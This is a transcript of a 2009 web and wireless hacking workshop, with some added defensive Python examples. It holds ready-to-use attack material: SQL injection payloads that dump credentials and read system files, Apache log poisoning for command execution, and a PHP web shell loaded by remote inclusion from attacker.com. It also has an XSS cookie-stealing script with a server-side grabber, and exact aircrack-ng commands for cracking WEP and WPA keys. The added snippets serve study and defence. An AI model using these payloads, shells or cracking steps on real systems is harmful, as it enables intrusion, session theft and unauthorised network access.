Web & Wireless Hacking (slide transcript)
Complete Guide on Web & Wireless Hacking
IPSECS
www.ipsecs.com
WEB & WIRELESS HACKING
Don “df0x” Anto
Makasar, June 2009
Content
• Introduction
• Web Exploitation
– SQL Injection
– File Inclusion
– XSS
• Breaking Wireless Infrastructure
– War Driving
– Exploiting Wireless Network
Introduction
• Don “df0x” Anto
• IT security researcher
• Hacker?? No, but IT security researcher
• Contact
• URL
– http://ipsecs.com
– http://kandangjamur.net
• Bachelor degree in Electrical Engineering
• Add my Facebook: [email protected]
1st Day, WEB HACKING
Web Exploitation
• Exploiting flaws in web application programming.
• Programming mistakes always happen.
• Targets clients or servers.
• Possible to steal databases and other sensitive information, steal cookies or sessions, execute arbitrary commands, or fully compromise the system.
• It's easy to do. Google helps you :).
Common Web Exploitation
• SQL Injection, an attack targeting sensitive information in the database server. Can lead to system compromise.
• File Inclusion, an attack usually used to gain shell access on the remote target.
– Local file inclusion
– Remote file inclusion
• Cross Site Scripting (XSS), an attack targeting the users or clients of a vulnerable website.
– DOM
– Persistent
– Non-persistent
SQL INJECTION
SQL Injection
• Injecting malicious SQL queries for profit.
• Usually used to bypass login or to steal sensitive information from the database. Further attacks can fully compromise the system.
• User input is not well validated, or there is no sanitization process.
• All examples and demos below are in PHP and MySQL.
SQL Injection in login form
• User input in the login form is not validated before it is executed by the database.
• An attacker can send arbitrary SQL queries through the login form and bypass the login process.
• The attacker can also execute other SQL queries.
Vulnerable Code
• Example vulnerable code in the login process:
$pass = md5($_POST['password']);
// username is concatenated straight into the query (intentionally vulnerable)
$query = "SELECT * FROM tblUser WHERE username = '" . $_POST['username'] . "' AND password = '" . $pass . "'";
$q = mysql_query($query);
• The username sent from the login form is not validated.
Exploit Login
• Exploit input:
username = admin' OR 'a'='a
password = terserah
• The SQL query executed by the database server is:
SELECT * FROM tblUser WHERE username = 'admin' OR 'a'='a' AND password = 'e00b29d5b34c3f78df09d45921c9ec47'
SQL Injection in login form
SQL Logic
• The AND operator is evaluated before OR, so the right-hand part of the query is:
'a'='a' AND password = 'e00b29d5b34c3f78df09d45921c9ec47'
• That boolean result is FALSE, which leaves:
username = 'admin' OR FALSE
• That boolean result is TRUE (the admin row matches).
• The attacker successfully bypasses the login form.
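Added example (not from the slides): the login above rebuilt in Python on an in-memory SQLite table so the precedence argument can actually be run, with the slide's concatenated query next to a parameterised one; the table contents and the admin password are constructed.

```python
import hashlib
import sqlite3

# Constructed in-memory stand-in for the slides' tblUser.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE tblUser (username TEXT, password TEXT)")
    # unsalted MD5 only to mirror the slide's code
    db.execute("INSERT INTO tblUser VALUES (?, ?)",
               ("admin", hashlib.md5(b"s3cret-admin-pw").hexdigest()))
    db.commit()
    return db

def login_vulnerable(db, username, password):
    """Mirrors the slide's PHP: string concatenation, no validation."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    query = ("SELECT * FROM tblUser WHERE username = '" + username +
             "' AND password = '" + pw_hash + "'")
    # AND binds tighter than OR here too, so `admin' OR 'a'='a` matches admin
    return db.execute(query).fetchone() is not None

def login_safe(db, username, password):
    """Parameterised query: the username is passed as data, never as SQL."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    row = db.execute(
        "SELECT * FROM tblUser WHERE username = ? AND password = ?",
        (username, pw_hash)).fetchone()
    return row is not None

def demo():
    db = make_db()
    payload = "admin' OR 'a'='a"          # the slide's injected username
    return {
        "vuln_bypass": login_vulnerable(db, payload, "terserah"),
        "vuln_wrong_pw": login_vulnerable(db, "admin", "terserah"),
        "safe_payload": login_safe(db, payload, "terserah"),
        "safe_real_pw": login_safe(db, "admin", "s3cret-admin-pw"),
    }
```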
SQL Injection in URI parameter
• Parameter input in the URI is not validated before it is executed by the database.
• An attacker can send arbitrary SQL queries by modifying the parameter input.
Vulnerable Code
• Example vulnerable code reading URI parameters:
// numeric parameter concatenated without a cast or validation (intentionally vulnerable)
$query = "SELECT * FROM news WHERE id=" . $_GET['aid'];
$q = mysql_query($query);
• Parameter 'aid', taken from the URI, is not validated.
Exploiting SQL Injection
• Checking for the vulnerability using AND logic:
http://example.com/news.php?aid=1 AND 1=1--
http://example.com/news.php?aid=1 AND 1=0--
• Finding the number of fields using UNION SELECT:
http://example.com/news.php?aid=1 UNION SELECT 1--
http://example.com/news.php?aid=1 UNION SELECT 1,2--
http://example.com/news.php?aid=1 UNION SELECT 1,2,3,..,n--
Knowing Number of Field
SQL Injection in URI parameter
• In this case the table that generates “news” contains 3 fields.
Exploiting SQL Injection
• Finding the tables in the database:
http://example.com/news.php?aid=-1 UNION SELECT 1,2,GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=database()--
• Finding the fields in table 'tblUser':
http://example.com/news.php?aid=-1 UNION SELECT 1,2,GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='tblUser'--
or, with the table name in hexadecimal:
http://example.com/news.php?aid=-1 UNION SELECT 1,2,GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name=0x74626c55736572--
Knowing Tables in DB
Exploiting SQL Injection
• Viewing information in tables:
http://example.com/news.php?aid=-1 UNION SELECT 1,2,CONCAT_WS(0x2c,username,password,namaLengkap) FROM tblUser--
• Viewing arbitrary files (if the FILE privilege is granted):
http://example.com/news.php?aid=-1 UNION SELECT 1,2,LOAD_FILE('/etc/passwd')--
or, with the path in hexadecimal:
http://example.com/news.php?aid=-1 UNION SELECT 1,2,LOAD_FILE(0x2f6574632f706173737764)--
Viewing Table Records
FILE INCLUSION
File Inclusion
• Including a malicious or sensitive file so that it is executed by the server.
• Usually used to steal sensitive information, execute arbitrary commands, or compromise the system.
• User input is not well validated, or there is no sanitization process.
• All examples and demos below are in PHP and MySQL.
Local File Inclusion
• Including a sensitive file on the local (vulnerable) server so that it is executed by the server.
• Usually used to steal sensitive information or execute arbitrary commands. Further attacks can fully compromise the system.
• User input is not well validated, or there is no sanitization process.
Vulnerable Code
• Example vulnerable code:
define('DOCROOT', '/var/www/html/modules');
// user-controlled name becomes part of the include path (intentionally vulnerable)
$filename = DOCROOT . "/" . $_GET['module'] . ".php";
include($filename);
• Parameter 'module', taken from the URI, is not validated.
Viewing Sensitive Files
• Exploit URIs to view sensitive files on the vulnerable system:
http://example.com/index.php?module=../../../../../../../etc/passwd%00
http://example.com/index.php?module=../../../../../../../etc/group%00
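Added example (not from the slides): the slide's path construction modelled in Python next to an allowlist version that only maps known module names to files; the module names are assumed, and the NUL truncation mirrors PHP builds older than 5.3.4, the release that started rejecting NUL bytes in file paths.

```python
import posixpath
import re
from urllib.parse import unquote

DOCROOT = "/var/www/html/modules"              # as defined on the slide
ALLOWED_MODULES = {"home", "news", "contact"}  # assumed module names

def resolve_module_vulnerable(module):
    """Path the slide's include() opens for ?module=<value>.
    Models pre-5.3.4 PHP, which stopped at the first NUL byte, so a
    trailing %00 cuts off the appended '.php'."""
    raw = DOCROOT + "/" + unquote(module) + ".php"
    truncated = raw.split("\x00", 1)[0]
    return posixpath.normpath(truncated)

def resolve_module_safe(module):
    """Allowlist the module name: only a known, plain lowercase name is
    accepted, and the resolved path is re-checked to stay under DOCROOT."""
    decoded = unquote(module)
    if not re.fullmatch(r"[a-z][a-z0-9_]*", decoded):
        return None                      # rejects '../', NUL, '/', '.'
    if decoded not in ALLOWED_MODULES:
        return None                      # unknown module, even if well-formed
    path = posixpath.normpath(posixpath.join(DOCROOT, decoded + ".php"))
    if not path.startswith(DOCROOT + "/"):
        return None                      # belt and braces
    return path
```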
File /etc/passwd
Placing Malicious Log
• Placing a malicious entry in the Apache log, using telnet to inject a system command:
$ telnet example.com 80
Trying example.com...
Connected to example.com.
Escape character is '^]'.
GET /<?php passthru($_GET['cmd']) ?> HTTP/1.1
Host:example.com
Malicious Log
Executing Command
• Executing commands via the Apache access_log (in case the Apache log is readable):
http://example.com/index.php?module=../../../../../../../usr/local/apache/logs/access_log%00&cmd=uname -a
http://example.com/index.php?module=../../../../../../../usr/local/apache/logs/access_log%00&cmd=id
Command “id”
Remote File Inclusion
• Including a file hosted on a remote (attacker) server so that it is executed by the vulnerable server.
• Usually used to execute arbitrary commands via a web shell. Further attacks can fully compromise the system.
• User input is not well validated, or there is no sanitization process.
Vulnerable Code
• Example vulnerable code:
// with allow_url_include enabled, 'page' may even be a remote URL (intentionally vulnerable)
$filename = $_GET['page'] . ".php";
include($filename);
• Parameter 'page', taken from the URI, is not validated.
PHP Shell
• Simple web shell:
<?php
/* Basic PHP web shell injek.txt */
if (isset($_GET['exec'])) {
    if (!empty($_GET['exec'])) {
        $cmd = $_GET['exec'];
        if (function_exists('passthru')) {
            passthru($cmd);
        }
    }
}
?>
Public PHP Shell
• Widely known web shells: r57, c99
• Commonly used in exploiting remote file inclusion.
r57
Executing Command
• Injecting commands:
http://example.com/view.php?page=http://attacker.com/injek.txt&exec=id
http://example.com/view.php?page=http://attacker.com/injek.txt&exec=ls -al
Command 'ls -al'
CROSS SITE SCRIPTING
Cross Site Scripting
• Inserting HTML/JavaScript code that is executed by the browser of a client viewing the vulnerable website.
• Usually used for stealing cookies from the client computer, phishing, and tricking users into downloading arbitrary files.
• User input is not well validated, or there is no sanitization process.
• All examples and demos below are in PHP and MySQL.
Cross Site Scripting
• DOM based XSS: XSS in a vulnerable file that comes with default installed software.
• Non-Persistent XSS: XSS in a vulnerable web page that can be exploited by tricking the user into clicking a malicious URI. Characteristic: temporary.
• Persistent XSS: XSS in a vulnerable web page that can be exploited to insert malicious code into the database. Characteristic: permanent.
Vulnerable Code
• Example vulnerable code:
// search term echoed into the page without escaping (intentionally vulnerable)
echo "<pre> Searching for " . $_GET['key'] . "...</pre><br/>\n";
• Parameter 'key', sent from the search form, is not validated.
Cross Site Scripting
• Checking whether the page is vulnerable to XSS:
http://example.com/search.php?key=<script>alert('XSS found dude!')</script>
Cross Site Scripting
Cookie Stealing
• Stealing the cookie:
http://example.com/search.php?key=<script src="http://attacker.com/payload.js"></script>
• Content of payload.js:
document.location="http://attacker.com/cookie-save.php?c="+document.cookie
Cookie Grabber
• Content of cookie-save.php:
<?php
/* Cookie stealer */
$f = fopen('/tmp/cookie.txt', 'a');
$date = date("j F, Y, g:i a");
fwrite($f, "IP Address : " . $_SERVER['REMOTE_ADDR'] . "\n" .
           "Cookie : " . $_GET['c'] . "\n" .
           "Date and Time : " . $date . "\n" .
           "\n\n");
fclose($f);
?>
Hex Encoding
• Obscuring the malicious URI using hex (percent) encoding:
http://example.com/search.php?key=<script src="http://attacker.com/payload.js"></script>
• The same URI, hex encoded:
http://example.com/search.php?key=%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%61%74%74%61%63%6b%65%72%2e%63%6f%6d%2f%70%61%79%6c%6f%61%64%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e
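Added example (not from the slides) serving both the URI SQL injection slides earlier and this hex-encoding slide: a small access-log scanner that percent-decodes every query parameter before matching, so the hex-encoded script tag is flagged exactly like the plain one; the log lines, client IPs and rule set are constructed.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed access-log lines (Apache-style, simplified); the payloads are
# the ones the slides show, percent-encoded as a browser would send them.
SAMPLE_LOG = """\
203.0.113.5 - - [09/Jun/2009:10:01:02 +0700] "GET /news.php?aid=1 HTTP/1.1" 200 512
203.0.113.5 - - [09/Jun/2009:10:01:09 +0700] "GET /news.php?aid=1%20AND%201=0-- HTTP/1.1" 200 128
203.0.113.5 - - [09/Jun/2009:10:02:15 +0700] "GET /news.php?aid=-1%20UNION%20SELECT%201,2,LOAD_FILE(0x2f6574632f706173737764)-- HTTP/1.1" 200 900
198.51.100.7 - - [09/Jun/2009:10:03:44 +0700] "GET /index.php?module=../../../../../../../etc/passwd%00 HTTP/1.1" 200 2048
198.51.100.7 - - [09/Jun/2009:10:05:01 +0700] "GET /search.php?key=%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%61%74%74%61%63%6b%65%72%2e%63%6f%6d%2f%70%61%79%6c%6f%61%64%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e HTTP/1.1" 200 300
198.51.100.7 - - [09/Jun/2009:10:06:30 +0700] "GET /search.php?key=kismet HTTP/1.1" 200 300
"""

REQ_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Rules run against the fully decoded parameter value, not the raw log text.
RULES = {
    "sqli": re.compile(r"(?i)\b(union\s+select|and\s+1=[01]|load_file|information_schema)\b|0x[0-9a-f]{4,}"),
    "lfi": re.compile(r"\.\./|\x00"),
    "xss": re.compile(r"(?i)<\s*script|javascript:"),
}

def decode_value(value, rounds=3):
    """Undo percent-encoding until it stops changing: the slide's hex form is
    plain percent-encoding, and double-encoding is a common evasion."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan_log(text):
    """Return (client_ip, rule_name, param, decoded_value) per suspicious parameter."""
    hits = []
    for line in text.splitlines():
        m = REQ_RE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        for part in urlsplit(target).query.split("&"):
            name, _, raw = part.partition("=")
            value = decode_value(raw)
            for rule, pattern in RULES.items():
                if pattern.search(value):
                    hits.append((ip, rule, name, value))
                    break      # first matching rule is enough per parameter
    return hits
```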
DEMO - Q&A WEB HACKING
THANK YOU!
2nd Day, WIRELESS HACKING
Wireless Network
• Now widely used on campuses, in government, in companies, and in many public places.
• Provides a network for mobile devices.
• More flexible than a wired network.
• More insecure than a wired network, so here we go!
War Driving
• The activity of searching for Wi-Fi wireless networks.
• Public tools for War Driving:
– Windows: NetStumbler, Wireshark
– Linux: Kismet, Aircrack-ng, AirSnort, Wireshark
– OSX: KisMAC
• I'm using Linux Ubuntu 8.10.
Kismet
• Console based 802.11 wireless network detector and sniffer.
• It identifies wireless networks by passively sniffing.
• It is already in the Ubuntu repository, or you can download it from www.kismetwireless.net.
• Use 'apt-get install kismet' on Ubuntu; read the README if you want to install from source.
Kismet
AirSnort
• GUI based 802.11 wireless network detector.
• Designed as a WEP cracker.
• It isn't available in my Ubuntu repository; download it from www.sourceforge.net.
• Read the README to install.
aircrack-ng (formerly: aircrack)
• Console based 802.11 wireless network detector.
• Designed as a WEP & WPA-PSK cracker.
• It is already in the Ubuntu repository, or you can download it from www.aircrack-ng.org.
• Use 'apt-get install aircrack-ng' on Ubuntu; read the README if you want to install from source.
aircrack-ng (formerly: aircrack)
airodump wlan0
Wireshark
• GUI based network protocol analyzer for UNIX and Windows.
• The most complete protocol analyzer, supporting many data communication protocols.
• It is already in the Ubuntu repository, or you can download it from www.wireshark.org.
• Use 'apt-get install wireshark' on Ubuntu; read the README if you want to install from source.
Wireshark
NetStumbler
• Best known Windows tool for finding wireless networks.
• It functions like Kismet on Linux or KisMAC on OSX.
• You can download NetStumbler at www.netstumbler.com
• Since I use Ubuntu, there's no demo for this tool.
NetStumbler
Wireless Network Protection
• MAC Filtering
• WEP (Wired Equivalent Privacy)
• WPA (Wi-Fi Protected Access)
• WPA2 (Wi-Fi Protected Access 2)
• Captive Portal
Exploiting Wireless Network
• Misconfiguration (Human Error)
• Spoofing
• Cracking Protection
• Denial of Service
Misconfiguration
• Default configuration on the device (Access Point)
• Default username & password
• Default IP address range
• SNMP public & private community strings
• No encryption enabled
Spoofing & Rogue AP
• Spoofing the MAC address to bypass MAC filtering.
• Tools
– Linux: ifconfig
– Windows: smac, regedit
• Creating a Rogue AP to trick wireless users, then doing Man in the Middle and sniffing.
• Tools
– airsnarf http://airsnarf.shmoo.com
MAC Spoofing
WEP Cracking
• WEP is based on the RC4 algorithm and CRC32.
• Collect as many weak IVs (Initialization Vectors) as possible to be used in the FMS attack.
• Accelerate IV collection using traffic injection.
• Tools: aircrack-ng, AirSnort
WEP Cracking
• Start the interface in monitor mode.
• Run Kismet to find the target AP.
• Find an AP with connected clients, or do fake authentication to associate with the AP if no client is connected.
• Inject packets using aireplay-ng
• Dump packets using airodump-ng
• Crack the dumped file using aircrack-ng
Dumping Packet
airodump-ng -c 11 --bssid 00:1c:10:b3:59:38 -w /tmp/output wlan0
Cracking Key
aircrack-ng -z -b 00:1c:10:b3:59:38 /tmp/output-01.cap
Key is “abcdef1234”
WPA Cracking
• WPA is based on the RC4 algorithm + TKIP/AES.
• WPA-PSK can be attacked using a dictionary attack.
• Of course, it needs a dictionary.
• Can be cracked offline.
• Tools: aircrack-ng
WPA Cracking
• Start the interface in monitor mode.
• Run Kismet to find the target AP.
• Find an AP that is protected by WPA.
• Dump packets using airodump-ng
• Wait for a client to authenticate to the AP, or deauthenticate a client that is connected to the AP.
• Crack the dumped file using aircrack-ng
WPA Cracking
airodump-ng -c 11 --bssid 00:21:29:79:50:F1 -w /tmp/out-psk wlan0
WPA Cracking
aircrack-ng -w /usr/share/dict/words -b 00:21:29:79:50:F1 /tmp/out-psk*.cap
Key is “miko2009”
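Added example (not from the slides): the WPA/WPA2-PSK derivation that makes the offline dictionary attack above possible, written out in Python. It shows why the SSID acts as a salt (one precomputed dictionary does not carry across network names) and that 4096 PBKDF2 iterations are the only per-guess cost, so a dictionary word like the recovered passphrase still falls; the SSID names used are assumed.

```python
import hashlib

WPA_PBKDF2_ITERATIONS = 4096   # fixed by the 802.11i standard
WPA_PSK_BYTES = 32             # 256-bit pairwise master key

def wpa_psk(ssid, passphrase):
    """Derive the WPA/WPA2 pre-shared key exactly as a station or AP does:
    PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 iterations, 32 bytes).
    The SSID is the salt, so the same passphrase gives a different PSK on
    every network name; the 4-way handshake captured by airodump-ng is what
    lets a guess be checked offline against this value."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), WPA_PBKDF2_ITERATIONS,
                               WPA_PSK_BYTES)

def psk_depends_on_ssid(passphrase, ssid_a, ssid_b):
    """True when one passphrase yields different PSKs on two SSIDs."""
    return wpa_psk(ssid_a, passphrase) != wpa_psk(ssid_b, passphrase)
```

The first assertion below uses the IEEE 802.11i reference vector (SSID "IEEE", passphrase "password"); "ipsecs-demo" is a constructed SSID paired with the passphrase recovered on the slide.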
Denial of Service
• Making the wireless network unavailable.
• Tools: airjack, void11, aircrack
DEMO - Q&A WIRELESS HACKING
THANK YOU!